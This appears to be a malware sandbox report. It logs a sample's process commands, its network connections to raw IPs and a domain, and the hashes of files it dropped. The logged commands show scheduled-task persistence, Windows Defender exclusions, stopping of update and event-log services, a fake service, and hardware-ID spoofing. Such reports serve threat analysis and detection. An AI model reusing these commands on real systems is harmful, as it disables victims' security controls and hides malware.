schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 13 /tr "'C:\ChainReview\DevManView.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 7 /tr "'C:\ChainReview\DevManView.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Videos\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\fr-FR\lsass.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\taskhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813724HP-TRGT2567SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513724HP-TRGT2567SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413724HP-TRGT2567FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613724HP-TRGT2567FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313724HP-TRGT2567DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713724HP-TRGT2567MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13743HP-TRGT1522AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613743HP-TRGT1522FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413743HP-TRGT1522FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313743HP-TRGT1522DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713743HP-TRGT1522MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe

"C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13760HP-TRGT22496AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213760HP-TRGT22496RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813760HP-TRGT22496SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513760HP-TRGT22496SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413760HP-TRGT22496FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313760HP-TRGT22496DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713760HP-TRGT22496MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613760HP-TRGT22496FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1619450566910135647-1410053359-1672108338-1974789323748415161-1532368068-438134973"

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "752025126-628002891-590700494-9858222077262813813564437261862708836546748825"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1411383421-1766168883-15612447962851288551989038863279291050881413273399109812"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-855617698-4768896551603069888-8372846494607090741998497141-1585860109-876566517"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-9334595191544904511-1150525792830207160-1622713821172833150018428872-1242952810"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: IGIR-TEFD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U0R-98E3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: L7JE-IEAE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VLBU-SKL4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1428107885-11538641226024456031794733802115650022-9071930901732239748-527732463"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: KE9P-0Z8T

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: IGGP-UKLB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: RAOO-RRR6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KKLB-C960

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: A7NP-UNMH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: T75M-GHH0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: VN8B-T1O4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: CT84-1AJB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 2URZ-S22J

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: R5JO-GH97

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AI2T-KCTR

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: OPT2-TZJR

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: SIMD-UBC1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KJVC-5HR7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "994691572-511111291-1292882474-304860791-1168667435-2060879657353229195201494862"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: COD4-LHH7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 5MPH-K67N

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

Country Destination Domain Proto
US 8.8.8.8:53 bookreading2024.net udp
US 104.21.61.25:443 bookreading2024.net tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
IT 185.196.11.122:80 185.196.11.122 tcp
RU 147.45.44.3:80 147.45.44.3 tcp
RU 147.45.44.3:80 147.45.44.3 tcp

Files

memory/1688-0-0x000007FEF5D53000-0x000007FEF5D54000-memory.dmp

memory/1688-1-0x00000000008E0000-0x000000000090C000-memory.dmp

memory/1688-2-0x00000000001D0000-0x00000000001D6000-memory.dmp

memory/1688-3-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

memory/1688-4-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

memory/1932-9-0x0000000002E10000-0x0000000002E90000-memory.dmp

memory/1932-10-0x000000001B800000-0x000000001BAE2000-memory.dmp

memory/1932-11-0x00000000027E0000-0x00000000027E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab39F6.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar3A47.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 76ab4183ad730e1bfa621f0842216ad7
SHA1 6f4edcb119d368fd0659fc00e505bb25e4602cd9
SHA256 955f5b01db5131821b47cbe29654a74547b7b327ab1f564991c5fe2d679718d7
SHA512 43c0f45bdfb5668e8960c3d8556b47cb71691cad87f022e2cd36ada2f239de77d7fa88d30c1e1ec9b871e45a6b53528f8e46d2ade704f43d6143a7c168b4edb9

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

MD5 280f228a0fd9232c72c66646f5ac8f27
SHA1 f6ed9a02fe24afa92b832efb95d4c140f1f9855a
SHA256 6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51
SHA512 5e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e

C:\Users\Admin\AppData\Roaming\conhostsft.exe

MD5 975eca3793d5ec51d4bd4041fe4bd595
SHA1 f3b36aad3566d36a81cb8ab11c49e28b8fbb807e
SHA256 50a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3
SHA512 af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89

\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 81a45f1a91448313b76d2e6d5308aa7a
SHA1 0d615343d5de03da03bce52e11b233093b404083
SHA256 fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe

MD5 bb93bfa99237b0efc8e476af92d2882c
SHA1 aa3285a0166dc7efe30a9156ea0d98af9f83651a
SHA256 92820ca93b03d8c98ffeee165a92b6fa536abd34c97bb692b51e70f6f74dbeb0
SHA512 40d8867fe2335315bd8de9da2571a0ba22e7760e5a6a9743a3aa611113406c0e4fc7f5b25986a18e58feb3e7e510923dc6320ae44fdce9ea02a467b3cab6ac70

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

\ProgramData\Microsoft\Windows\DevManView.exe

MD5 33d7a84f8ef67fd005f37142232ae97e
SHA1 1f560717d8038221c9b161716affb7cd6b14056e
SHA256 a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512 c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

C:\ProgramData\Microsoft\Windows\DevManView.cfg

MD5 43b37d0f48bad1537a4de59ffda50ffe
SHA1 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256 fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512 cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat

MD5 62a4289ada4d67fedd4d54ba96b5b228
SHA1 c60573ddfd05111be1adf47d28cd04ecadd5eaef
SHA256 6c4f31567a23e66fb38e0d495d8a0c2d4284d03ce58d3a45e7964a3f68035d50
SHA512 d609dd9179a243fe2f89559276bd424490045e80d112f63c63b20271f1f63c0ad2d89bf256e2c0dfba29c37e2ba34bb7067e02388aa1490e22fc13660473d64a

\ChainReview\sphyperRuntimedhcpSvc.exe

MD5 93457a02f578affc1800d7528c5370f3
